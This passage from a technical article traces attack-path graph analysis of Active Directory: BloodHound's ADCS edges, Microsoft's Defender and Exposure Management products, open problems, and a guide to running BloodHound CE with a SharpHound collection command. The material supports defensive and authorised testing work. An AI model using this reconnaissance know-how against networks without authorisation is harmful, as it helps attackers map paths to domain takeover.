&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge is a &lt;strong&gt;Group(&lt;code&gt;Authenticated Users&lt;/code&gt;) to Computer(coerced target)&lt;/strong&gt; edge, not a Computer to Computer edge as some early secondary writeups described. The relay-target CA and the certificate template are carried as &lt;em&gt;edge metadata&lt;/em&gt;, not as additional graph nodes. The canonical edge documentation is explicit: &lt;em&gt;Source: Authenticated Users [Group] / Destination: Computer / Traversable: Yes&lt;/em&gt; [@bloodhound-coerce-relay-edge].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The schema correction matters because the source-principal choice affects every shortest-path query that crosses ESC8. If the edge is mis-modelled as Computer to Computer, queries that begin from a low-privilege user account miss the path entirely. The Group-to-Computer schema correctly captures that &lt;em&gt;any authenticated principal&lt;/em&gt; can coerce.&lt;/p&gt;
&lt;p&gt;What the graph does not yet model is also worth naming. The &lt;code&gt;SpecterOps/TierZeroTable&lt;/code&gt; README states it verbatim: &lt;em&gt;&quot;DISCLAIMER: The table does not include all Tier Zero assets yet.&quot;&lt;/em&gt; [@specterops-tier-zero-table] Several edge classes remain partially or fully out of scope; the full enumeration appears in Section 11 (open problems). Coverage expansion is iterative and community-fed; OpenGraph (Section 9) is the structural answer to &quot;where does the graph end?&quot;&lt;/p&gt;

flowchart TD
    subgraph OnPrem[&quot;On-prem Active Directory&quot;]
        Members[&quot;MemberOf, Owns&quot;]
        ACL[&quot;ACL write-equivalents&lt;br /&gt;GenericAll, WriteDacl, ForceChangePassword,&lt;br /&gt;AddKeyCredentialLink&quot;]
        Sessions[&quot;HasSession&quot;]
        Exec[&quot;AdminTo, CanRDP, ExecuteDCOM,&lt;br /&gt;CanPSRemote, SQLAdmin&quot;]
        Krb[&quot;Kerberos delegation&lt;br /&gt;AllowedToDelegate, AllowedToAct, CoerceToTGT&quot;]
    end
    subgraph Entra[&quot;Entra ID and AzureRM&quot;]
        EntraRoles[&quot;AZGlobalAdmin, AZRoleAssignment,&lt;br /&gt;AZAddSecret, AZUserAccessAdministrator,&lt;br /&gt;PIM roles&quot;]
        AzureRM[&quot;AZContains, AZOwns,&lt;br /&gt;AzureRM resource roles&quot;]
    end
    subgraph ADCS[&quot;ADCS composite edges&quot;]
        ESC[&quot;ADCSESC1 to ADCSESC10,&lt;br /&gt;CoerceAndRelayNTLMToADCS&quot;]
    end
    subgraph Open[&quot;OpenGraph user-defined&quot;]
        Custom[&quot;GitHub, Snowflake, SQL Server,&lt;br /&gt;ServiceNow, Tailscale, Duo, custom&quot;]
    end
    OnPrem --&amp;gt; Cypher((Cypher query layer))
    Entra --&amp;gt; Cypher
    ADCS --&amp;gt; Cypher
    Open --&amp;gt; Cypher
&lt;p&gt;If this is what one community modelled, the natural question is: what did Microsoft model? And when?&lt;/p&gt;
&lt;h2&gt;8. The defender adoption -- Microsoft catches up, 2018 to 2024&lt;/h2&gt;
&lt;p&gt;The defender vendor whose product BloodHound was mapping is also a defender vendor with a graph product of its own. Three of them, in fact, shipped in three different years for three different substrates. They are easy to confuse; press releases sometimes do.&lt;/p&gt;
&lt;p&gt;The first arrived on November 27, 2018, when Tali Ash (then a Program Manager on the Azure Advanced Threat Protection team) announced a preview feature called &lt;em&gt;Lateral Movement Paths&lt;/em&gt; (LMPs) in a Microsoft tech-community post [@ms-azure-atp-lmp-2018]. LMPs were a graph-shaped visualisation, but a constrained one: restricted to &quot;sensitive accounts&quot; (a configurable set defaulting to Domain Admins and similar) plus non-sensitive accounts that had shared a session on the same host as a sensitive account.&lt;/p&gt;
&lt;p&gt;The portal rendered one- and two-hop credential-theft pivots as a static SVG. There was no Cypher equivalent, no LMP-export API, and no way to write a custom query. Azure ATP was rebranded &lt;strong&gt;Microsoft Defender for Identity&lt;/strong&gt; in 2020, and the LMP feature came along under the new name [@ms-mdi-lmp-docs].&lt;/p&gt;
&lt;p&gt;Several secondary sources date Lateral Movement Paths to &quot;June 2019,&quot; which corresponds to the general-availability and rebrand window rather than the original preview announcement. The primary Microsoft tech-community post is November 27, 2018; treat the year-not-month for any third-party claim and prefer the November 2018 preview date as the canonical first ship.&lt;/p&gt;
&lt;p&gt;The second arrived in October 2022, when Microsoft Defender for Cloud&apos;s Defender CSPM plan added a &lt;em&gt;cloud security graph&lt;/em&gt; with attack-path analysis (public preview at Ignite October 2022; generally available March 28, 2023) [@ms-defender-cloud-attack-path]. This product is a &lt;em&gt;cloud&lt;/em&gt; attack-path graph: Azure plus AWS plus GCP asset inventory, with inferred edges for permissions, network reachability, vulnerability presence, and internet exposure. It is explicitly &lt;em&gt;not&lt;/em&gt; the Active Directory identity graph; it covers the multi-cloud workload surface.&lt;/p&gt;
&lt;p&gt;A common mistake conflates this 2022-2023 product (Defender for &lt;em&gt;Cloud&lt;/em&gt;) with Microsoft Defender for &lt;em&gt;Identity&lt;/em&gt; (the LMP product from November 2018). The substrate, the team, and the year are all different. Worth flagging here because secondary writeups repeat the confusion often.&lt;/p&gt;

The Microsoft Defender XDR product family is a naming minefield. *Defender for Identity* (MDI) is the on-prem AD identity-threat product; LMPs are its graph view. *Defender for Cloud* (MDC) is the multi-cloud workload-protection product; its CSPM plan ships cloud-security-graph attack-path analysis. *Defender for Endpoint* (MDE) is the EDR product; it does not ship its own attack-path graph but feeds telemetry into MSEM. *Microsoft Security Exposure Management* (MSEM, GA November 19, 2024) is the unified exposure-graph layer that subsumes the others. Four products, four substrates, four ship dates. The naming overlap is unfortunate but the distinctions are real.
&lt;p&gt;The third arrived on November 19, 2024, at the Ignite 2024 keynote in Chicago. Satya Nadella, in the opening keynote, announced that &lt;strong&gt;Microsoft Security Exposure Management&lt;/strong&gt; (MSEM) had reached general availability [@ms-ignite-2024-msem]. MSEM is the product whose attack-path model is &lt;em&gt;structurally equivalent&lt;/em&gt; to BloodHound&apos;s: cross-substrate (identity plus endpoint plus multi-cloud), first-class attack-path objects with choke-point and blast-radius dashboards, and continuous data feed via the Defender XDR signal plane.&lt;/p&gt;

Microsoft&apos;s unified exposure-graph product, generally available November 19, 2024, at Ignite 2024 in Chicago. MSEM ingests telemetry from Defender for Endpoint, Defender for Identity, Defender for Cloud, Entra ID, and the Defender XDR plane into a single graph. Attack paths are first-class objects with three dashboard views: an attack-path list, choke-point analysis (small sets of nodes whose compromise enables disproportionately many downstream paths), and blast-radius (downstream reach of a selected node) [@ms-msem-attack-paths].
&lt;p&gt;The MSEM docs page introduces the model verbatim: &lt;em&gt;&quot;Attack paths in Microsoft Security Exposure Management help you to proactively identify and visualize potential routes that attackers can exploit using vulnerabilities, gaps, and misconfigurations across endpoints, cloud environments, and hybrid infrastructures.&quot;&lt;/em&gt; And, on choke points: &lt;em&gt;&quot;By focusing on these choke points, you can reduce risk by addressing high-impact assets.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The query interface is the Defender XDR portal plus KQL (Kusto Query Language), not Cypher. The graph engine is proprietary; Microsoft does not publish per-query latency numbers or the underlying algorithms. But the model -- nodes, typed edges, attack paths as the unit of analysis, choke-point and blast-radius views -- is the model BloodHound shipped at DEF CON 24 in August 2016.&lt;/p&gt;
&lt;p&gt;The arc takes eight years. From the August 6, 2016 BloodHound talk to the November 19, 2024 MSEM general-availability announcement is eight years and three months. The defender vendor whose product the original BloodHound was mapping ships a defender product whose attack-path model is structurally equivalent to the one a red-team consultancy shipped in a conference talk eight years earlier.&lt;/p&gt;
&lt;p&gt;Microsoft adopted the model. The community kept extending it. By 2026 the frontier is no longer &lt;em&gt;&quot;does the graph exist?&quot;&lt;/em&gt; It is &lt;em&gt;&quot;how do we make the graph weighted, complete, and substrate-independent?&quot;&lt;/em&gt; That is the state of the art.&lt;/p&gt;
&lt;h2&gt;9. State of the art -- Tier Zero, ADCS edges, and OpenGraph, 2023 to 2026&lt;/h2&gt;
&lt;p&gt;By the time MSEM shipped, SpecterOps had already moved past &lt;em&gt;&quot;is there a graph?&quot;&lt;/em&gt; and was asking three sharper questions. Where does the graph end? How do we model attack primitives that compose from raw facts? And does the AD-specific schema even matter?&lt;/p&gt;
&lt;p&gt;The first question is what &lt;em&gt;&quot;Tier Zero&quot;&lt;/em&gt; means. On June 22, 2023, Jonas Bülow Knudsen, Elad Shamir, and Justin Kohler at SpecterOps published &lt;em&gt;What is Tier Zero -- Part 1&lt;/em&gt;, which reframed Microsoft&apos;s tiered-administration concept -- introduced in the 2012-2014 Securing Privileged Access guidance and renamed the Enterprise Access Model with the &quot;Control Plane&quot; vocabulary in December 2020 [@ms-enterprise-access-model] -- as a property &lt;em&gt;of the graph&lt;/em&gt; [@specterops-2023-tier-zero].&lt;/p&gt;
&lt;p&gt;A Tier Zero asset (see Definition below) reframes Microsoft&apos;s tiered concept from &lt;em&gt;the set of things in the high-privilege tier&lt;/em&gt; to &lt;em&gt;the set of things from which the high-privilege tier is reachable&lt;/em&gt;. Microsoft&apos;s own Tier 0 definition -- &lt;em&gt;&quot;Direct Control of enterprise identities... and all the assets in it&quot;&lt;/em&gt; -- becomes a graph property. The two formulations are equivalent if and only if the graph is complete. If the graph is incomplete (which it is), the Tier Zero set computed from the graph is the floor, not the ceiling.&lt;/p&gt;

Any node in the attack-path graph whose compromise lets an attacker reach an administrative privilege in the forest. The companion `SpecterOps/TierZeroTable` GitHub project is the community-maintained inventory; the README discloses that the table is the floor, not the ceiling [@specterops-tier-zero-table].
&lt;p&gt;The Tier Zero definition is the answer to &lt;em&gt;&quot;shortest path to what?&quot;&lt;/em&gt; -- the target side of every BloodHound shortest-path query. Without a defined Tier Zero set, the question has no endpoint.&lt;/p&gt;
&lt;p&gt;The second question is how to model attack primitives that compose. The January 24, 2024 SpecterOps blog by Knudsen formalised this with the traversable / non-traversable edge distinction discussed in Section 7. The mechanism generalises: any attack primitive whose exploitability is a conjunction of raw facts can be encoded as a composed edge that the post-processor synthesises when the pattern is present.&lt;/p&gt;
&lt;p&gt;ESC1, walked through in Section 7, is the canonical example: nine numbered prerequisites that the post-processor checks before writing the composed &lt;code&gt;ADCSESC1&lt;/code&gt; edge [@specterops-2024-adcs-bloodhound]. Subsequent posts in the series extended the same machinery to ESC3, ESC4, ESC6, ESC7, ESC8 (the &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge), ESC9, ESC10, and -- on February 14, 2024 -- ESC13 [@specterops-2024-esc13].&lt;/p&gt;
&lt;p&gt;In December 2024 BloodHound v6.3 introduced an early-access &quot;improved analysis algorithm&quot; internally referred to as &lt;strong&gt;Butterfly&lt;/strong&gt; [@bloodhound-v6-3-release]. Butterfly is the first production attempt at &lt;em&gt;bi-directional impact&lt;/em&gt; analysis. Pre-v6.3 BloodHound Enterprise quantified risk as &quot;&lt;em&gt;who can reach this node?&lt;/em&gt;&quot; (incoming attack-path count). v6.3 also quantifies &quot;&lt;em&gt;who can this node reach if compromised?&lt;/em&gt;&quot; (outgoing blast radius).&lt;/p&gt;
&lt;p&gt;The release notes describe the outcome but not the algorithm: &lt;em&gt;&quot;Improve risk scoring fidelity for all finding types... Measure risk at each individual finding... Support the inclusion of hybrid paths in risk scoring (Azure assets will now contribute to measured risk in AD and vice versa).&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The same release also announced that BloodHound Enterprise had begun migrating off Neo4j onto PostgreSQL as the &lt;em&gt;graph&lt;/em&gt; database, with the release notes reporting &lt;em&gt;&quot;&amp;gt;50% improvement in the time it takes to perform post-processing during the Analysis process.&quot;&lt;/em&gt; Cypher continues to be the query language; the engine underneath changed.&lt;/p&gt;
&lt;p&gt;The third question -- whether the AD-specific schema matters -- got its answer on July 29, 2025, when SpecterOps released BloodHound v8.0 with &lt;strong&gt;OpenGraph&lt;/strong&gt; [@specterops-2025-opengraph]. OpenGraph decouples the graph engine from the AD-specific schema. Users (and SpecterOps partners) define their own node and edge kinds and ingest attack-path data from arbitrary substrates. The initial release included GitHub organisations, Snowflake role hierarchies, Microsoft SQL Server logins, ServiceNow groups, and Tailscale ACLs. Subsequent community contributions extended the library.&lt;/p&gt;

BloodHound OpenGraph is a foundational shift toward... identity risk management across the entire enterprise. -- Justin Kohler, SpecterOps Chief Product Officer, July 29, 2025.
&lt;p&gt;OpenGraph is the closing observation of an arc that began with Phillips and Swiler in 1998: &lt;em&gt;the model is the abstraction; the substrate is whatever your enterprise runs.&lt;/em&gt; The same &lt;code&gt;shortestPath()&lt;/code&gt; that finds Active Directory attack paths now finds attack paths over a GitHub organisation, a Snowflake role hierarchy, or a Microsoft SQL Server login graph, with no engine change. The 2026 BloodHound release (v9.1.0, May 6, 2026, per the public release-notes index [@bloodhound-release-notes-index]) extends OpenGraph and adds incremental edge updates -- the first step toward a streaming graph rather than a snapshot.&lt;/p&gt;
&lt;h2&gt;10. Competing approaches -- BloodHound versus Microsoft versus the alternatives&lt;/h2&gt;
&lt;p&gt;In 2026 no single product covers every substrate. The field is plural.&lt;/p&gt;
&lt;p&gt;A practitioner choosing among attack-path tools answers four questions, in order. What substrate do you need to cover? Self-host or SaaS? Snapshot or continuous? Open query language or vendor portal? The table below assembles the answers on the dimensions a 2026 practitioner actually uses.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Substrate&lt;/th&gt;
&lt;th&gt;Engine&lt;/th&gt;
&lt;th&gt;Query language&lt;/th&gt;
&lt;th&gt;Deployment&lt;/th&gt;
&lt;th&gt;Licensing&lt;/th&gt;
&lt;th&gt;Edge weighting&lt;/th&gt;
&lt;th&gt;ADCS coverage&lt;/th&gt;
&lt;th&gt;Best fit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;BloodHound CE 9.x&lt;/td&gt;
&lt;td&gt;AD + Entra + AzureRM + OpenGraph&lt;/td&gt;
&lt;td&gt;Neo4j + Postgres app DB&lt;/td&gt;
&lt;td&gt;Cypher&lt;/td&gt;
&lt;td&gt;Self-hosted Docker Compose&lt;/td&gt;
&lt;td&gt;Apache-2.0&lt;/td&gt;
&lt;td&gt;No (unweighted BFS)&lt;/td&gt;
&lt;td&gt;Yes -- ESC1 through ESC10 + ESC8 composite&lt;/td&gt;
&lt;td&gt;Authorised offensive testing + DIY blue team&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BloodHound Enterprise&lt;/td&gt;
&lt;td&gt;Same as CE&lt;/td&gt;
&lt;td&gt;PostgreSQL-as-graph (in-progress migration off Neo4j)&lt;/td&gt;
&lt;td&gt;Cypher&lt;/td&gt;
&lt;td&gt;SaaS&lt;/td&gt;
&lt;td&gt;Commercial&lt;/td&gt;
&lt;td&gt;Bi-directional (Butterfly v6.3+); weighting function not public&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Continuous AD/Entra attack-surface management at enterprise scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Adalanche&lt;/td&gt;
&lt;td&gt;AD (on-prem; LDIF or live LDAP)&lt;/td&gt;
&lt;td&gt;In-memory Go&lt;/td&gt;
&lt;td&gt;AQL (GQL-like)&lt;/td&gt;
&lt;td&gt;Single Go binary&lt;/td&gt;
&lt;td&gt;Open source&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (per README)&lt;/td&gt;
&lt;td&gt;Offline / air-gapped analysis from LDIF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Security Exposure Management&lt;/td&gt;
&lt;td&gt;Defender XDR signal: identity + endpoint + multi-cloud + Entra&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;td&gt;KQL + portal&lt;/td&gt;
&lt;td&gt;SaaS&lt;/td&gt;
&lt;td&gt;Microsoft licensing&lt;/td&gt;
&lt;td&gt;Implicit (filter against exploitability oracle)&lt;/td&gt;
&lt;td&gt;Indirect via MDI signals&lt;/td&gt;
&lt;td&gt;Hybrid Microsoft-substrate unified exposure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDI Lateral Movement Paths&lt;/td&gt;
&lt;td&gt;On-prem AD (sensitive-account paths only)&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;td&gt;None -- portal only&lt;/td&gt;
&lt;td&gt;SaaS&lt;/td&gt;
&lt;td&gt;Microsoft licensing&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Implicit via separate MDI alerts&lt;/td&gt;
&lt;td&gt;Default-on credential-hopping detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender for Cloud CSPM attack-path analysis&lt;/td&gt;
&lt;td&gt;Multi-cloud (Azure + AWS + GCP)&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;td&gt;Cloud Security Explorer + KQL&lt;/td&gt;
&lt;td&gt;SaaS&lt;/td&gt;
&lt;td&gt;Microsoft licensing&lt;/td&gt;
&lt;td&gt;Implicit&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Multi-cloud workload protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PingCastle / Semperis DSP / ADAudit Plus&lt;/td&gt;
&lt;td&gt;On-prem AD (+ limited Entra)&lt;/td&gt;
&lt;td&gt;None -- list-of-findings&lt;/td&gt;
&lt;td&gt;None -- HTML / portal&lt;/td&gt;
&lt;td&gt;Self-hosted or SaaS&lt;/td&gt;
&lt;td&gt;Commercial / mixed&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Single-finding hygiene only&lt;/td&gt;
&lt;td&gt;Compliance auditing and change tracking&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;A few rows deserve commentary.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; BloodHound CE ships under &lt;strong&gt;Apache-2.0&lt;/strong&gt; per the current repository [@bloodhound-ce-repo]. The GPL-3.0 license you may see in older treatments applies only to the deprecated BloodHound Legacy v4 repository [@bloodhound-legacy-repo], which was last updated in 2023 and is no longer maintained. The licensing difference is material: GPL-3.0 is copyleft, Apache-2.0 is permissive. Downstream use cases that need permissive licensing should rely on the current CE.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Older blog posts and conference talks frequently call BloodHound CE GPL-3.0. The CE-Legacy LICENSE block does carry the GPL-3.0 copyright header, which is the source of the confusion. The &lt;em&gt;current&lt;/em&gt; CE codebase at github.com/SpecterOps/BloodHound is Apache-2.0; the GPL-3.0 LICENSE applies only to the deprecated Legacy v4 repository.&lt;/p&gt;
&lt;p&gt;Adalanche, by Lars Karlslund, is the load-bearing counter-example to the claim that &quot;the graph model requires Neo4j&quot; [@adalanche-repo]. Adalanche reads AD data from an LDIF dump or live LDAP, builds the graph entirely in process memory, and exposes a web GUI plus an Adalanche Query Language (AQL) -- described in the README as &lt;em&gt;&quot;a GQL-like language that allows for complex queries.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The README&apos;s headline claim is verbatim: &lt;em&gt;&quot;Adalanche gives instant results, showing you what permissions users and groups have in an Active Directory.&quot;&lt;/em&gt; The trade is no continuous monitoring, no multi-user web app, and a smaller community in exchange for zero deployment friction. The model is identical; the engine is replaceable.&lt;/p&gt;
&lt;p&gt;MSEM is the closest Microsoft analogue to BloodHound (see Section 8 for substrate and query interface). Reasonable defenders run &lt;em&gt;both&lt;/em&gt; MSEM and BloodHound (CE or Enterprise) on the same forest. The tools are complementary rather than substitutionary: MSEM brings the EDR plus workload-protection telemetry that BloodHound does not natively ingest, while BloodHound brings the precise AD edge semantics that SpecterOps&apos;s research community has validated. Running both is not double-counting.&lt;/p&gt;
&lt;p&gt;The hygiene scanners -- PingCastle [@pingcastle], Semperis DSP [@semperis-dsp], ManageEngine ADAudit Plus [@manageengine-adaudit-plus] -- are the surviving descendants of the per-object ACL-inspection generation, with risk-scoring layered on top. They are valuable for compliance auditing and change tracking. They do not expose a queryable attack-path graph. The compliance auditor and the attack-path analyst are different personas with different tools.&lt;/p&gt;
&lt;p&gt;If the field is plural and every tool has a gap, what is the shape of the problem that no tool yet solves? The next section is the honest answer.&lt;/p&gt;
&lt;h2&gt;11. Theoretical limits and open problems&lt;/h2&gt;
&lt;p&gt;Some of the gaps in attack-path analysis are engineering gaps. Others are not.&lt;/p&gt;
&lt;p&gt;The single most consequential open problem is &lt;strong&gt;edge weighting&lt;/strong&gt;. BloodHound&apos;s BFS treats every edge as one hop. In reality, &lt;code&gt;MemberOf&lt;/code&gt; is effectively free; &lt;code&gt;ForceChangePassword&lt;/code&gt; requires the attacker to log in as the changed principal afterwards; &lt;code&gt;AddKeyCredentialLink&lt;/code&gt; requires shadow-credential infrastructure; &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; requires an active SMB-coercion primitive, NTLM relay tooling, and an ESC8-vulnerable certificate authority. A shortest-&lt;em&gt;hop&lt;/em&gt; path is not in general the shortest-&lt;em&gt;exploitation-cost&lt;/em&gt; path.&lt;/p&gt;
&lt;p&gt;BloodHound Enterprise v6.3 shipped the Butterfly analysis as the first production attempt to relax this assumption. As the v6.3 release notes acknowledge (see Section 9), Butterfly&apos;s weighting function is not publicly documented [@bloodhound-v6-3-release].&lt;/p&gt;
&lt;p&gt;Academic intuition suggests weighting edges by an exploitation-success probability and computing &lt;em&gt;most-likely-exploited&lt;/em&gt; paths via shortest paths under negative-log-probability weights. The complexity ceiling is well-known: Dijkstra (with non-negative weights) runs in $O(E + V\log V)$ time with a Fibonacci heap; Bellman-Ford handles negative weights at $O(VE)$. Either fits comfortably inside the per-query budget BloodHound already operates within.&lt;/p&gt;
&lt;p&gt;The unsolved part is the &lt;em&gt;empirical calibration&lt;/em&gt;: what numerical weight is the right weight on a &lt;code&gt;ForceChangePassword&lt;/code&gt; edge versus a &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge? There is no published peer-reviewed answer.&lt;/p&gt;
&lt;p&gt;The second open problem is &lt;strong&gt;coverage&lt;/strong&gt;. The &lt;code&gt;TierZeroTable&lt;/code&gt; README is the authoritative self-disclosure: file-system ACLs on member servers, fine-grained GPO delegation, on-host service-account permissions, some Entra conditional-access logic, and cross-tenant Entra B2B trust paths remain partially or fully out of scope [@specterops-tier-zero-table]. This is an &lt;em&gt;engineering&lt;/em&gt; problem -- more collectors, more edge definitions -- rather than an algorithmic one. OpenGraph is the structural answer: shift coverage from &quot;what edges has SpecterOps modelled?&quot; to &quot;what edges has the community contributed to the shared library?&quot; [@bloodhound-opengraph-library].&lt;/p&gt;
&lt;p&gt;The third is &lt;strong&gt;graph privacy&lt;/strong&gt;. A continuously-collected, complete AD privilege graph shipped to a third-party SaaS backend is, in adversarial hands, a pre-computed attack plan for the customer&apos;s forest. Tenant isolation, encryption at rest, SOC 2 and FedRAMP attestation, and customer-managed key encryption do not eliminate the structural risk: a compromised SaaS backend yields the customer&apos;s graph regardless of compliance posture.&lt;/p&gt;
&lt;p&gt;Cryptographic approaches -- homomorphic graph queries, secure multi-party computation for path enumeration -- exist in the theoretical literature but are not in production attack-path products at time of writing. Adalanche and self-hosted BloodHound CE remain the privacy-preserving options at the cost of forgoing continuous monitoring.&lt;/p&gt;
&lt;p&gt;The fourth is the &lt;strong&gt;the graph is alive&lt;/strong&gt; problem. Session edges (&lt;code&gt;HasSession&lt;/code&gt;) go stale in hours. New ACEs, new group memberships, new sessions appear continuously. SharpHound&apos;s snapshot model is yesterday&apos;s view; continuous collectors (BloodHound Enterprise, MSEM agent streams) trade stealth for freshness. The May 6, 2026 release notes describe BloodHound CE&apos;s first move toward a streaming model: &lt;em&gt;&quot;incremental edge updates that reduce unnecessary writes during post-processing&quot;&lt;/em&gt; [@bloodhound-release-notes-index]. No production attack-path tool yet ships a fully streaming graph.&lt;/p&gt;
&lt;p&gt;The fifth is &lt;strong&gt;combinatorial intractability&lt;/strong&gt;. These are not engineering gaps; they are complexity-theoretic facts.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Counting all attack paths is #P-complete.&lt;/strong&gt; Leslie Valiant&apos;s 1979 result on the complexity of counting solutions to combinatorial problems applies directly: counting the simple paths between two nodes in a general graph cannot be done in polynomial time unless P = #P [@valiant-1979-permanent]. BloodHound&apos;s path-count UI is necessarily an approximation or a length-truncation; this is the theoretical reason why.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The minimum-edge-cut &quot;defender hardening&quot; problem is NP-hard.&lt;/strong&gt; Choose the smallest set of edges whose removal disconnects the attacker from the goal. Sheyner et al. 2002 proved the result is NP-hard but admits an $O(\log n)$ approximation [@sheyner-et-al-2002-attack-graphs]. BHE choke-point ranking and MSEM choke-point analysis necessarily implement heuristic approximations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Finding regular simple paths is NP-complete.&lt;/strong&gt; Mendelzon and Wood 1995 proved that finding a simple path matching a regular expression over edge labels in a graph database is NP-complete [@mendelzon-wood-1995-dblp]. Cypher&apos;s &lt;code&gt;shortestPath()&lt;/code&gt; does not enforce simple-path semantics, which is why it remains in P; quantified path patterns with &lt;code&gt;DIFFERENT RELATIONSHIPS&lt;/code&gt; semantics (available since Neo4j 5.x and documented in the current Cypher manual [@neo4j-cypher-variable-length]) do enforce simple paths and so cross into the NP-complete regime.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; BloodHound&apos;s per-query algorithm (BFS, $O(V + E)$) is optimal up to constants. The frontier of the field is no longer the algorithm. It is what &lt;em&gt;question&lt;/em&gt; we ask the algorithm: weighted? regular-path? simple-path? bi-directional? cross-substrate? Each open question is a different model, not a different implementation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Three further honest framings deserve a mention.&lt;/p&gt;
&lt;p&gt;First, the &lt;strong&gt;standardisation of OpenGraph edge taxonomies&lt;/strong&gt; is unsettled. Without community convergence on edge naming, different contributors may model the same substrate with incompatible schemas. Historical precedent (MITRE ATT&amp;amp;CK technique IDs, CVE identifiers) suggests that convergence happens when a single high-trust curator becomes the de-facto registry; whether SpecterOps will operate OpenGraph as a vendor-neutral standards body or as a SpecterOps-owned artefact is a governance question, not an algorithmic one.&lt;/p&gt;
&lt;p&gt;Second, the &lt;strong&gt;adversarial robustness of the collector&lt;/strong&gt; is an open question: SharpHound runs as an authenticated principal, and an attacker with prior compromise can poison the collection. There is no closed-form defence.&lt;/p&gt;
&lt;p&gt;Third, the &lt;strong&gt;absence of any public head-to-head benchmark&lt;/strong&gt; of BloodHound CE versus BHE versus Adalanche versus MSEM on the same forest under controlled conditions is structural: Microsoft does not publish per-query latency, SpecterOps publishes only relative improvement claims, and the academic line uses 2005-era hardware figures that are not comparable.&lt;/p&gt;
&lt;h2&gt;12. Practical guide -- running BloodHound today&lt;/h2&gt;
&lt;p&gt;If the previous sections sold you on the model, the next few paragraphs are the minimum you need to stand it up.&lt;/p&gt;
&lt;p&gt;Stand up BloodHound CE with the Docker Compose file in the repository [@bloodhound-ce-repo]. The stack is four containers: a PostgreSQL application database (users, roles, sessions, audit logs, saved queries); a Neo4j graph database holding the property graph; a Go REST API; and a React plus Sigma.js single-page frontend. Five minutes to first boot on a developer laptop. The repository README is the authoritative deployment reference.&lt;/p&gt;
&lt;p&gt;Run &lt;strong&gt;SharpHound&lt;/strong&gt; on a domain-joined Windows host as the collection identity. The default invocation -- &lt;code&gt;SharpHound.exe --CollectionMethods all,GPOLocalGroup&lt;/code&gt; -- enumerates every group membership, every recognised ACL pattern, every active session, every local-admin relationship, and every Kerberos delegation. Run &lt;strong&gt;AzureHound&lt;/strong&gt; with appropriate Entra ID credentials for Entra and AzureRM coverage. Both emit JSON dumps in the same envelope; the BloodHound CE upload tab in the web UI ingests both.&lt;/p&gt;
&lt;p&gt;Open the web UI. The stock pre-built queries are a reasonable starting palette: &lt;em&gt;Find Shortest Paths to Domain Admins&lt;/em&gt;, &lt;em&gt;Find Principals with DCSync Rights&lt;/em&gt;, &lt;em&gt;Find Computers with Unsupported Operating Systems&lt;/em&gt;, and &lt;em&gt;Shortest Paths from Owned Principals to High-Value Targets&lt;/em&gt; (after marking some accounts as owned). Custom Cypher goes in the Cypher tab at the top right; the Section 6 query is a good template.&lt;/p&gt;
&lt;p&gt;The most important interpretation discipline: treat the result as a &lt;em&gt;risk register&lt;/em&gt;, not a vulnerability list. A finding is &quot;Bob can reach Domain Admins via a four-hop path.&quot; The &lt;em&gt;edge&lt;/em&gt; is &quot;Bob has &lt;code&gt;GenericWrite&lt;/code&gt; on Carol.&quot; Closing the edge breaks the finding &lt;em&gt;and&lt;/em&gt; every other path that passed through it. Edges are the unit of remediation, not findings. SpecterOps&apos;s own 2021 customer-anonymous essay &lt;em&gt;Active Directory Attack Paths -- Is It Always This Bad?&lt;/em&gt; reports findings from hundreds of engagements, and the recurring observation across forests is that a small number of high-blast-radius edges explain most of the discovered paths [@specterops-2021-ad-attack-paths].&lt;/p&gt;
&lt;p&gt;A few pitfalls are worth naming. &lt;code&gt;HasSession&lt;/code&gt; collection generates measurable LDAP and SAMR traffic that Microsoft Defender for Identity alerts on; coordinate with the blue team or expect detections. The stealth collection mode trades coverage for traffic volume.&lt;/p&gt;
